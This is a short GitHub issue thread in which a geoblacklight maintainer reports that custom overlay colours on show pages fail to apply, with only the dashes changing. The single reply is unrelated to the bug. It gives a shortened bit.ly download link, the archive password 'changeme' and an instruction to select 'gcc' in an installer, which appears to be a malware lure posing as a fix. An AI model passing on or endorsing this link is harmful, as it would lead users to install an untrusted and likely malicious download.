### ISSUE TITLE
customization for overlays on show pages not working.

### ISSUE THREAD

**Issue by dnoneill** [geoblacklight/geoblacklight#1573]
### Descriptive summary

When you update your settings to have custom overlay colors, the overlay stays the wrong color, only the dashes update color

![Screenshot 2024-08-27 at 10 17 19 AM](https://github.com/user-attachments/assets/339d9a83-224f-442e-93d6-93d5924b5a69)

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
